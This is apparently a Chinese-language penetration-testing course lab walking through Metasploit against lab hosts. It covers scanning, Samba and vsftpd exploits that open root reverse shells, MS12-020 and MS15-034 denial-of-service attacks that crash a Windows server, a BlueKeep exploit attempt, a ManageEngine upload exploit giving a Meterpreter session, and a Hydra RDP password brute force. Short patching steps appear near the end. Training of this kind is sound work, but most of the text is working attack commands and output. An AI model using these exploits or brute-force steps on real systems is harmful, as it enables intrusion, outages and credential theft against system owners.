02： MSF常用模块解析、辅助模块Auxiliary、Exploit漏洞利用模块、 Windows常见漏洞实战、CVE-2019-0708漏洞利用、桌面管理软件漏洞利用 - CASE - 《网络运维与安全》

1 Auxiliary 辅助模块
- 1.1 问题
- 1.2 步骤
2 Exploit 漏洞利用模块
- 2.1 问题
- 2.2 步骤
3 HTTP.sys RCE 漏洞利用
- 3.1 问题
- 3.2 步骤
4 CVE-2019-0708 漏洞利用
- 4.1 问题
- 4.2 步骤
5 桌面管理软件漏洞利用
- 5.1 问题
- 5.2 步骤

Top

Auxiliary 辅助模块
Exploit 漏洞利用模块
HTTP.sys RCE 漏洞利用
CVE-2019-0708 漏洞利用
桌面管理软件漏洞利用

1 Auxiliary 辅助模块

1.1 问题

1）扫描 Tomcat Web 服务版本

2）Mysql 数据枚举用户信息

3）HTTP 扫描

4）MS12-020 漏洞扫描

1.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：扫描 Tomcat Web 服务版本


1.  msf6 > search tomcat_admin
3.  Matching Modules
4.  ================
6.     #  Name                                        Disclosure Date  Rank    Check  Description
7.     -  \-\-\-\-                                        \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-    \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  auxiliary/admin/http/tomcat_administration                   normal  No     Tomcat Administration Tool Default Access
11.  msf6 > use 0
12.  msf6 auxiliary(admin/http/tomcat_administration) > set rhosts 192.168.10.143
13.  rhosts => 192.168.10.143
14.  msf6 auxiliary(admin/http/tomcat_administration) > run
16.  \[*\] http:
17.  \[*\] Scanned 1 of 1 hosts (100% complete)
18.  \[*\] Auxiliary module execution completed

步骤二：MySQL 数据枚举用户信息


1.  msf6 > search mysql_enum
3.  Matching Modules
4.  ================
6.     #  Name                              Disclosure Date  Rank    Check  Description
7.     -  \-\-\-\-                              \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-    \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  auxiliary/admin/mysql/mysql_enum                   normal  No     MySQL Enumeration Module
11.  Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_enum
13.  msf6 > use 0
14.  msf6 auxiliary(admin/mysql/mysql_enum) > set rhosts 192.168.10.143
15.  rhosts => 192.168.10.143
16.  msf6 auxiliary(admin/mysql/mysql_enum) > set username root
17.  username => root
18.  msf6 auxiliary(admin/mysql/mysql_enum) > run
19.  \[*\] Running module against 192.168.10.143
21.  \[*\] 192.168.10.143:3306 - Running MySQL Enumerator...
22.  \[*\] 192.168.10.143:3306 - Enumerating Parameters
23.  \[*\] 192.168.10.143:3306 -       MySQL Version: 5.0.51a-3ubuntu5
24.  \[*\] 192.168.10.143:3306 -       Compiled for the following OS: debian-linux-gnu
25.  \[*\] 192.168.10.143:3306 -       Architecture: i486
26.  \[*\] 192.168.10.143:3306 -       Server Hostname: metasploitable
27.  \[*\] 192.168.10.143:3306 -       Data Directory: /var/lib/mysql/
28.  \[*\] 192.168.10.143:3306 -       Logging of queries and logins: OFF
29.  \[*\] 192.168.10.143:3306 -       Old Password Hashing Algorithm OFF
30.  \[*\] 192.168.10.143:3306 -       Loading of local files: ON
31.  \[*\] 192.168.10.143:3306 -       Deny logins with old Pre-4.1 Passwords: OFF
32.  \[*\] 192.168.10.143:3306 -       Allow Use of symlinks for Database Files: YES
33.  \[*\] 192.168.10.143:3306 -       Allow Table Merge: YES
34.  \[*\] 192.168.10.143:3306 -       SSL Connections: Enabled
35.  \[*\] 192.168.10.143:3306 -       SSL CA Certificate: /etc/mysql/cacert.pem
36.  \[*\] 192.168.10.143:3306 -       SSL Key: /etc/mysql/server-key.pem
37.  \[*\] 192.168.10.143:3306 -       SSL Certificate: /etc/mysql/server-cert.pem
38.  \[*\] 192.168.10.143:3306 - Enumerating Accounts:
39.  \[*\] 192.168.10.143:3306 -       List of Accounts with Password Hashes:
40.  \[+\] 192.168.10.143:3306 -               User: debian-sys-maint Host:  Password Hash: 
41.  \[+\] 192.168.10.143:3306 -               User: root Host: % Password Hash: 
42.  \[+\] 192.168.10.143:3306 -               User: guest Host: % Password Hash: 
43.  \[*\] 192.168.10.143:3306 -       The following users have GRANT Privilege:
44.  \[*\] 192.168.10.143:3306 -               User: debian-sys-maint Host: 
45.  \[*\] 192.168.10.143:3306 -               User: root Host: %
46.  \[*\] 192.168.10.143:3306 -               User: guest Host: %
47.  \[*\] 192.168.10.143:3306 -       The following users have CREATE USER Privilege:
48.  \[*\] 192.168.10.143:3306 -               User: root Host: %
49.  \[*\] 192.168.10.143:3306 -               User: guest Host: %
50.  \[*\] 192.168.10.143:3306 -       The following users have RELOAD Privilege:
51.  \[*\] 192.168.10.143:3306 -               User: debian-sys-maint Host: 
52.  \[*\] 192.168.10.143:3306 -               User: root Host: %
53.  \[*\] 192.168.10.143:3306 -               User: guest Host: %
54.  \[*\] 192.168.10.143:3306 -       The following users have SHUTDOWN Privilege:
55.  \[*\] 192.168.10.143:3306 -               User: debian-sys-maint Host: 
56.  \[*\] 192.168.10.143:3306 -               User: root Host: %
57.  \[*\] 192.168.10.143:3306 -               User: guest Host: %
58.  \[*\] Auxiliary module execution completed

步骤三：HTTP 扫描


1.  msf6 > search dir_scanner 
3.  Matching Modules
4.  ================
6.     #  Name                                Disclosure Date  Rank    Check  Description
7.     -  \-\-\-\-                                \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-    \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  auxiliary/scanner/http/dir_scanner                   normal  No     HTTP Directory Scanner
11.  Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/dir_scanner
13.  msf6 > use 0
14.  msf6 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.10.143
15.  rhosts => 192.168.10.143
16.  msf6 auxiliary(scanner/http/dir_scanner) > run
18.  \[*\] Detecting error code
19.  \[*\] Using code '404' as not found for 192.168.10.143
20.  \[+\] Found http:
21.  \[+\] Found http:
22.  \[+\] Found http:
23.  \[+\] Found http:
24.  \[+\] Found http:
25.  \[+\] Found http:
26.  \[*\] Scanned 1 of 1 hosts (100% complete)
27.  \[*\] Auxiliary module execution completed

步骤四：MS12-020 漏洞扫描


1.  msf6 > search ms12-020
3.  Matching Modules
4.  ================
6.     #  Name                                              Disclosure Date  Rank    Check  Description
7.     -  \-\-\-\-                                              \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-    \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  auxiliary/dos/windows/rdp/ms12\_020\_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
9.     1  auxiliary/scanner/rdp/ms12\_020\_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
12.  Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rdp/ms12\_020\_check
14.  msf6 > use 1
15.  msf6 auxiliary(scanner/rdp/ms12\_020\_check) > set rhosts 192.168.10.145
16.  rhosts => 192.168.10.145
17.  msf6 auxiliary(scanner/rdp/ms12\_020\_check) > run
19.  \[+\] 192.168.10.145:3389   - 192.168.10.145:3389 - The target is vulnerable.
20.  \[*\] 192.168.10.145:3389   - Scanned 1 of 1 hosts (100% complete)
21.  \[*\] Auxiliary module execution completed

2 Exploit 漏洞利用模块

2.1 问题

1）SMB 服务漏洞利用

2）VSFTPD 后门漏洞利用

3）PHP 代码参数注入

4）RDP 远程命令执行漏洞

2.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：SMB 服务漏洞利用


1.  msf6 > search CVE-2007-2447
3.  Matching Modules
4.  ================
6.     #  Name                                Disclosure Date  Rank       Check  Description
7.     -  \-\-\-\-                                \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-       \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution
11.  Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
13.  msf6 > use 0
14.  \[*\] No payload configured, defaulting to cmd/unix/reverse_netcat
15.  msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.10.143
16.  rhosts => 192.168.10.143
17.  msf6 exploit(multi/samba/usermap_script) > run
19.  \[*\] Started reverse TCP handler on 192.168.10.136:4444 
20.  \[*\] Command shell session 1 opened (192.168.10.136:4444 -> 192.168.10.143:58125) at 2021-03-23 21:17:35 +0800
22.  pwd
23.  /
25.  whoami
26.  root

步骤二：VSFTPD 后门漏洞利用


1.  msf6 > search vsftpd
3.  Matching Modules
4.  ================
6.     #  Name                                  Disclosure Date  Rank       Check  Description
7.     -  \-\-\-\-                                  \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-       \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  exploit/unix/ftp/vsftpd\_234\_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
11.  Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd\_234\_backdoor
13.  msf6 > use 0
14.  \[*\] No payload configured, defaulting to cmd/unix/interact
15.  msf6 exploit(unix/ftp/vsftpd\_234\_backdoor) > set rhosts 192.168.10.143
16.  rhosts => 192.168.10.137
17.  msf6 exploit(unix/ftp/vsftpd\_234\_backdoor) > run
19.  \[*\] 192.168.10.137:21 - Banner: 220 (vsFTPd 2.3.4)
20.  \[*\] 192.168.10.137:21 - USER: 331 Please specify the password.
21.  \[+\] 192.168.10.137:21 - Backdoor service has been spawned, handling...
22.  \[+\] 192.168.10.137:21 - UID: uid=0(root) gid=0(root)
23.  \[*\] Found shell.
24.  \[*\] Command shell session 2 opened (0.0.0.0:0 -> 192.168.10.143:6200) at 2021-03-23 21:23:43 +0800
26.  uname -a
27.  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
29.  whoami
30.  root

步骤三：RDP 远程命令执行漏洞


1.  msf6 > search ms12-020
3.  Matching Modules
4.  ================
6.     #  Name                                              Disclosure Date  Rank    Check  Description
7.     -  \-\-\-\-                                              \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-    \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  auxiliary/dos/windows/rdp/ms12\_020\_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
9.     1  auxiliary/scanner/rdp/ms12\_020\_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
12.  Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rdp/ms12\_020\_check
14.  msf6 > use 0
15.  msf6 auxiliary(dos/windows/rdp/ms12\_020\_maxchannelids) > set rhosts 192.168.10.145
16.  rhosts => 192.168.10.145
17.  msf6 auxiliary(dos/windows/rdp/ms12\_020\_maxchannelids) > run
18.  \[*\] Running module against 192.168.10.145
20.  \[*\] 192.168.10.145:3389 - 192.168.10.145:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
21.  \[*\] 192.168.10.145:3389 - 192.168.10.145:3389 - 210 bytes sent
22.  \[*\] 192.168.10.145:3389 - 192.168.10.145:3389 - Checking RDP status...
23.  \[+\] 192.168.10.145:3389 - 192.168.10.145:3389 seems down
24.  \[*\] Auxiliary module execution completed

攻击成功，如图 - 1 所示。

CASE - 图1

图 - 1

3 HTTP.sys RCE 漏洞利用

3.1 问题

1）在 OpenVAS 扫描结果中找到 HTTP.sys RCE 漏洞

2）利用漏洞攻击 Win2008 Server

使用 POC 脚本检测目标漏洞
Msf 控制台搜索 CVE-2015-1635
使用扫描脚本扫描目标主机
发现目标存在漏洞，进行漏洞利用

3）漏洞防御

关闭 IIS 核心缓存
安装系统补丁文件

3.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：检查扫描结果

查看漏洞信息、分析结果。

CASE - 图2

图 - 2

步骤二：利用漏洞攻击 Win2008 Server

1）查看 POC 漏洞检查脚本


1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# cat cve-2015-1635.poc                                                                 
3.  import socket
5.  import random
7.  ipAddr = "192.168.10.145"
9.  hexAllFfff = "18446744073709551615"
11.  req1 = "GET / HTTP/1.0\\r\\n\\r\\n"
13.  req = "GET / HTTP/1.1\\r\\nHost: stuff\\r\\nRange: bytes=0-" + hexAllFfff + "\\r\\n\\r\\n"
15.  print "\[*\] Audit Started"
17.  client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
19.  client_socket.connect((ipAddr, 80))
21.  client_socket.send(req1)
23.  boringResp = client_socket.recv(1024)
25.  if "Microsoft" not in boringResp:
27.      print "\[*\] Not IIS"
29.      exit(0)
31.  client_socket.close()
33.  client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
35.  client_socket.connect((ipAddr, 80))
37.  client_socket.send(req)
39.  goodResp = client_socket.recv(1024)
41.  if "Requested Range Not Satisfiable" in goodResp:
43.      print "\[!!\] Looks VULN"
45.  elif "The request has an invalid header name" in goodResp:
47.      print "\[*\] Looks Patched"
49.  else:
51.      print "\[*\] Unexpected response, cannot discern patch status"
53.  ┌──(root@localhost)-\[~/桌面\]
54.  └─# python cve-2015-1635.poc 
55.  \[*\] Audit Started
56.  \[!!\] Looks VULN

2）Msf 控制台搜索 CVE-2015-1635


1.  msf6 > search CVE-2015-1635 或 MS15-034
2.  0  auxiliary/dos/http/ms15\_034\_ulonglongadd    
3.  1  auxiliary/scanner/http/ms15\_034\_http\_sys\_memory_dump

3）使用扫描脚本扫描目标主机


1.  msf6 > use 1
2.  msf6 auxiliary(scanner/http/ms15\_034\_http\_sys\_memory_dump) > set rhosts 192.168.10.145
3.  rhosts => 192.168.10.145
4.  msf6 auxiliary(scanner/http/ms15\_034\_http\_sys\_memory_dump) > run 
6.  \[+\] Target may be vulnerable...
7.  \[+\] Stand by...
8.  \[-\] Memory dump start position not found, dumping all data instead
10.  \[+\] Memory contents:
11.  48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64    |HTTP/1.1 400 Bad|
12.  20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e    | Request..Conten|
13.  74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d    |t-Type: text/htm|
14.  6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73    |l; charset=us-as|
15.  63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63    |cii..Server: Mic|
16.  72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32    |rosoft-HTTPAPI/2|
17.  2e 30 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32    |.0..Date: Mon, 2|
18.  32 20 4d 61 72 20 32 30 32 31 20 30 32 3a 31 33    |2 Mar 2021 02:13|
19.  3a 33 35 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74    |:35 GMT..Connect|
20.  69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74    |ion: close..Cont|
21.  65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 36 0d    |ent-Length: 346.|
22.  0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d    |...<!DOCTYPE HTM|
23.  4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43    |L PUBLIC "-//W3C|
24.  2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f    |//DTD HTML 4.01/|
25.  2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e    |/EN""http://www.|
26.  77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f    |w3.org/TR/html4/|
27.  73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48    |strict.dtd">..<H|
28.  54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45    |TML><HEAD><TITLE|
29.  3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49    |>Bad Request</TI|
30.  54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50    |TLE>..<META HTTP|
31.  2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d    |-EQUIV="Content-|
32.  54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74    |Type" Content="t|
33.  65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65    |ext/html; charse|
34.  74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45    |t=us-ascii"></HE|
35.  41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42    |AD>..<BODY><h2>B|
36.  61 64 20 52 65 71 75 65 73 74 20 2d 20 52 65 71    |ad Request - Req|
37.  75 65 73 74 20 54 6f 6f 20 4c 6f 6e 67 3c 2f 68    |uest Too Long</h|
38.  32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20    |2>..<hr><p>HTTP |
39.  45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 73    |Error 400. The s|
40.  69 7a 65 20 6f 66 20 74 68 65 20 72 65 71 75 65    |ize of the reque|
41.  73 74 20 68 65 61 64 65 72 73 20 69 73 20 74 6f    |st headers is to|
42.  6f 20 6c 6f 6e 67 2e 3c 2f 70 3e 0d 0a 3c 2f 42    |o long.</p>..</B|
43.  4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a             |ODY></HTML>..|
46.  \[+\] Memory dump saved to /root/.msf4/loot/20210322101335\_default\_192.168.10.145_iis.ms15034_994565.bin
47.  \[*\] Scanned 1 of 1 hosts (100% complete)
48.  \[*\] Auxiliary module execution completed

4）发现目标存在漏洞，进行漏洞利用


1.  msf6 auxiliary(scanner/http/ms15\_034\_http\_sys\_memory_dump) > back
2.  msf6 > use 0
3.  msf6 auxiliary(dos/http/ms15\_034\_ulonglongadd) > set rhosts 192.168.10.145
4.  rhosts => 192.168.10.145
5.  msf6 auxiliary(dos/http/ms15\_034\_ulonglongadd) > run
7.  \[*\] DOS request sent
8.  \[*\] Scanned 1 of 1 hosts (100% complete)
9.  \[*\] Auxiliary module execution completed

Win2008 蓝屏，如图 - 3 所示。

CASE - 图3

图 - 3

步骤三：漏洞防御

1）关闭 IIS 核心缓存

如图 - 4、图 - 5 所示。

CASE - 图4

图 - 4

CASE - 图5

图 - 5

2）安装系统补丁文件

访问微软官网下载补丁文件 Windows6.1-KB3042553-x86.msu，或者使用 Windows 自动更新进行升级。下载地址：https://www.microsoft.com/zh-tw/download/details.aspx?id=46501 。

3）检查结果

如图 - 6、图 - 7 所示。

CASE - 图6

图 - 6

CASE - 图7

图 - 7

4 CVE-2019-0708 漏洞利用

4.1 问题

1）查找 CVE-2019-0708 漏洞

2）利用漏洞攻击 Win2008 Server

3）漏洞防御

4.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：检查扫描结果

1）查找脚本


1.  msf6 > search CVE-2019-0708
2.     #  Name                                            Disclosure Date  Rank    Check  Description
3.     -  \-\-\-\-                                            \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-    \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
4.     0  auxiliary/scanner/rdp/cve\_2019\_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
5.     1  exploit/windows/rdp/cve\_2019\_0708\_bluekeep\_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

2）使用扫描脚本扫描


1.  msf6 > use 0
2.  msf6 auxiliary(scanner/rdp/cve\_2019\_0708_bluekeep) > set rhosts 192.168.10.145
3.  rhosts => 192.168.10.145
4.  msf6 auxiliary(scanner/rdp/cve\_2019\_0708_bluekeep) > run
6.  \[+\] 192.168.10.145:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
7.  \[*\] 192.168.10.145:3389   - Scanned 1 of 1 hosts (100% complete)
8.  \[*\] Auxiliary module execution completed

步骤二: 利用漏洞攻击 Win2008 Server

1）切换脚本进行漏洞利用


1.  msf6 auxiliary(scanner/rdp/cve\_2019\_0708_bluekeep) > back
2.  msf6 > use 1
3.  \[*\] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

2）设置目标主机地址


1.  msf6 exploit(windows/rdp/cve\_2019\_0708\_bluekeep\_rce) > set rhosts 192.168.10.145

3）设置目标系统


1.  msf6 exploit(windows/rdp/cve\_2019\_0708\_bluekeep\_rce) > set target 4
2.  target => 4
3.  msf6 exploit(windows/rdp/cve\_2019\_0708\_bluekeep\_rce) > run
4.  \[*\] Started reverse TCP handler on 192.168.10.136:4444 
5.  \[*\] 192.168.10.145:3389 - Executing automatic check (disable AutoCheck to override)
6.  \[*\] 192.168.10.145:3389 - Using auxiliary/scanner/rdp/cve\_2019\_0708_bluekeep as check
7.  \[+\] 192.168.10.145:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
8.  \[*\] 192.168.10.145:3389   - Scanned 1 of 1 hosts (100% complete)
9.  \[+\] 192.168.10.145:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
10.  \[*\] 192.168.10.145:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
11.  \[!\] 192.168.10.145:3389 - <---------------- | Entering Danger Zone | ---------------->
12.  \[*\] 192.168.10.145:3389 - Surfing channels ...
13.  \[*\] 192.168.10.145:3389 - Lobbing eggs ...
14.  \[*\] 192.168.10.145:3389 - Forcing the USE of FREE'd object ...
15.  \[!\] 192.168.10.145:3389 - <---------------- | Leaving Danger Zone | ---------------->
16.  \[*\] Exploit completed, but no session was created.

攻击成功，如图 - 8 所示。

CASE - 图8

图 - 8

步骤三: 漏洞防御

1）安装补丁，如图 - 9 所示

CASE - 图9

图 - 9

2）重启系统再次进行漏洞扫描

如图 - 10 所示。

CASE - 图10

图 - 10

5 桌面管理软件漏洞利用

5.1 问题

1）查找 CVE-2015-8249 漏洞

2）利用漏洞攻击 Win2008 Server

3）暴力破解系统密码

5.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：查找漏洞


1.  msf6 > search CVE-2015-8249
3.  Matching Modules
4.  ================
6.     #  Name                                                  Disclosure Date  Rank       Check  Description
7.     -  \-\-\-\-                                                  \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-       \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  exploit/windows/http/manageengine\_connectionid\_write  2015-12-14       excellent  Yes    ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability

步骤二：漏洞利用获取 meterpreter


1.  msf6 > use 0
2.  set\[*\] No payload configured, defaulting to windows/meterpreter/reverse_tcp
3.  msf6 exploit(windows/http/manageengine\_connectionid\_write) > set rhosts 192.168.10.145
4.  rhosts => 192.168.10.145
5.  msf6 exploit(windows/http/manageengine\_connectionid\_write) > exploit 
7.  \[*\] Started reverse TCP handler on 192.168.10.136:4444 
8.  \[*\] Creating JSP stager
9.  \[*\] Uploading JSP stager QJTdv.jsp...
10.  \[*\] Executing stager...
11.  \[*\] Sending stage (175174 bytes) to 192.168.10.145
12.  \[*\] Meterpreter session 1 opened (192.168.10.136:4444 -> 192.168.10.145:49298) at 2021-03-22 12:11:57 +0800
13.  \[!\] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/QJTdv.jsp' on the target

步骤三：权限受限无法获取管理员权限


1.  meterpreter > getuid 
2.  Server username: NT AUTHORITY\LOCAL SERVICE
4.  meterpreter > getsystem
5.  \[-\] priv\_elevate\_getsystem: Operation failed: This function is not supported on this system.
7.  meterpreter > hashdump
8.  \[-\] priv\_passwd\_get\_sam\_hashes: Operation failed: The parameter is incorrect.

步骤四：收集系统信息准备暴力破解系统口令


1.  meterpreter > shell
2.  Process 2404 created.
3.  Channel 2 created.
4.  Microsoft Windows \[Version 6.1.7601\]
5.  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
6.  C:\ManageEngine\DesktopCentral_Server\bin>net user
7.  net user
9.  User accounts for \\\
11.  \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-
12.  Administrator            anakin\_skywalker         artoo\_detoo              
13.  ben\_kenobi               boba\_fett                c\_three\_pio              
14.  chewbacca                darth_vader              greedo                   
15.  Guest                    han\_solo                 jabba\_hutt               
16.  jarjar\_binks             kylo\_ren                 lando_calrissian         
17.  leia\_organa              luke\_skywalker           sshd                     
18.  sshd_server              vagrant                  
19.  The command completed with one or more errors.
20.  C:\ManageEngine\DesktopCentral_Server\bin>dir c:\users
21.  dir c:\users
22.   Volume in drive C is Windows 2008R2
23.   Volume Serial Number is 9CAA-5EC4
25.   Directory of c:\users
27.  10/05/2020  10:31 PM    <DIR>          .
28.  10/05/2020  10:31 PM    <DIR>          ..
29.  03/10/2021  08:17 AM    <DIR>          Administrator
30.  10/05/2020  10:31 PM    <DIR>          Classic .NET AppPool
31.  07/13/2009  09:57 PM    <DIR>          Public
32.  10/05/2020  10:25 PM    <DIR>          sshd_server
33.  10/05/2020  10:53 PM    <DIR>          vagrant
34.                 0 File(s)              0 bytes
35.                 7 Dir(s)  46,855,233,536 bytes free

步骤五：生成口令字典文件

如图 - 11、图 - 12 所示。

CASE - 图11

图 - 11

CASE - 图12

图 - 12

步骤六：利用 hydra 进行暴力破解


1.  ┌──(root💀localhost)-\[~/桌面\]
2.  └─# hydra  -l administrator -P safe6pass.txt  192.168.10.145 rdp
3.  Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these \*\*\* ignore laws and ethics anyway).
5.  Hydra (https:
6.  \[WARNING\] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
7.  \[INFO\] Reduced number of tasks to 4 (rdp does not like many parallel connections)
8.  \[WARNING\] the rdp module is experimental. Please test, report - and if possible, fix.
9.  \[WARNING\] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
10.  \[DATA\] max 4 tasks per 1 server, overall 4 tasks, 2058 login tries (l:1/p:2058), ~515 tries per task
11.  \[DATA\] attacking rdp://192.168.10.145:3389/
12.  \[3389\]\[rdp\] host: 192.168.10.145   login: administrator   password: vagrant
13.  1 of 1 target successfully completed, 1 valid password found
14.  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-22 12:33:17
16.  ┌──(root💀localhost)-\[~/桌面\]
17.  └─# hydra  -l vagrant -P safe6pass.txt  192.168.10.145 rdp 
18.  Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
20.  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-22 12:34:43
21.  \[WARNING\] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
22.  \[INFO\] Reduced number of tasks to 4 (rdp does not like many parallel connections)
23.  \[WARNING\] the rdp module is experimental. Please test, report - and if possible, fix.
24.  \[DATA\] max 4 tasks per 1 server, overall 4 tasks, 2058 login tries (l:1/p:2058), ~515 tries per task
25.  \[DATA\] attacking rdp:
26.  \[3389\]\[rdp\] host: 192.168.10.145   login: vagrant   password: vagrant
27.  1 of 1 target successfully completed, 1 valid password found
28.  Hydra (https:

https://tts.tmooc.cn/ttsPage/NTD/NTDTN202109/PENTEST/DAY02/CASE/01/index.html